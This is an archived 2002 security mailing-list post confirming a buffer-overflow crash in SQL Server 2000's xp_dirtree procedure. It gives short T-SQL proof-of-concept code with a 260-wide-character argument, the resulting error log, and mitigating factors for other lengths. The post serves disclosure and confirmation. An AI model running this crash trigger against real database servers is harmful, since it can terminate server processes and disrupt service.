Re: Another Sql Server 7 Buffer Overflow

From: Bronek Kozicki (brok@RUBIKON.PL)
Date: 03/07/02 

Date:         Thu, 7 Mar 2002 18:34:47 +0100
From: Bronek Kozicki <brok@RUBIKON.PL>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

I can confirm this on SQL Server 2000 Service Pack 2 + Security update
Q316333, there are some mitigating factors however.

SQL Server version (from ERRORLOG):
2002-03-07 16:13:49.18 server Microsoft SQL Server 2000 - 8.00.578
(Intel X86)
 Feb 12 2002 20:54:17
 Copyright (c) 1988-2000 Microsoft Corporation
 Developer Edition on Windows NT 5.0 (Build 2195: Service Pack 2)
[ . . . ]
2002-03-07 18:09:15.43 spid51 Using 'xpstar.dll' version '2000.80.561' to
execute extended stored procedure 'xp_dirtree'.

I used SQL code from SHATTER research team at Application Security:
1> DECLARE @test nvarchar(4000)
2> SET @test = (SELECT replicate(N'n',260))
3> execute xp_dirtree @test
4> go
1>

... which caused this error (from ERRORLOG again):
2002-03-07 18:09:15.48 spid51 Error: 0, Severity: 20, State: 0
2002-03-07 18:09:15.48 spid51 Stored function 'xp_dirtree' in the library
'xpstar.dll' generated an access violation. SQL Server is terminating
process 51..

Mitigating factors:

1. Argument lenght has to be exactly 260 wide characters: procedure works
smoothly if parameter string is shorter, and does return an error (ie.
parameter check) if string is longer:
1> DECLARE @test nvarchar(4000)
2> SET @test = (SELECT replicate(N'n',261))
3> execute xp_dirtree @test
4> go
Msg 22006, Level 15, State 1:
Error executing extended stored procedure: Invalid Parameter
1>

2. Problem does not occur when 8-bit characters are used (ie. narrow string)
, no matter how long string is:
1> DECLARE @test varchar(8000)
2> SET @test = (SELECT replicate('n',8000))
3> execute xp_dirtree @test
4> go
 subdirectory

              depth
 ---------------------------------------------------------------------------
--------------------------------------------------------

        --------------------------------------------------------------------
--------------------------------------------------------

        ----- -----------

1>
... above is exactly what the procedure is supposed to do.

Kind regards

B.

Relevant Pages

  • Re: Extended Stored Procedure: Loopback connection
    ... SQL Server ships a sample exactly showing this: ... SQLRETURN sret, ... SRV_PROC* srvproc); ... NULL, 0, 0, "Error executing extended stored procedure: ...
    (microsoft.public.sqlserver.odbc)
  • Re: Linking tables access - sql server 2005
    ... Another advantage of this method is that you don't need an ODBC setting on the local computer, ... Create a linked table to SQL Server without using a DSN ... Name of the table that you are linking to on the SQL Server database ... Function AttachDSNLessTable(stLocalTableName As String, stRemoteTableName As String, stServer As String, stDatabase As String, Optional stUsername As ...
    (microsoft.public.access.adp.sqlserver)
  • Re: Cannot Generate SSPI Context - help
    ... I have used the following DSN-less string: ... Microsoft OLE DB Provider for SQL Server error '80004005' ... When a connection is "trusted," it means ... > How would one connect to a remote SQL Server using Windows authen? ...
    (microsoft.public.inetserver.asp.db)
  • Re: INSERT Query problem with Quotes & Apostrophes
    ... I've got front-ends that go against both Jet and SQL Server databases. ... InputText As String, _ ... >> Delimiter, Delimiter & Delimiter) ... dDateTime, ...
    (microsoft.public.access.modulesdaovba)
  • Re: ADO.NET 2.0 saving single space to SQL?
    ... It is code someone else wrote quite some time ago and all of the string ... Hitchhiker's Guide to Visual Studio and SQL Server ... and Hitchhiker's Guide to SQL Server 2005 Compact Edition (EBook) ...
    (microsoft.public.dotnet.framework.adonet)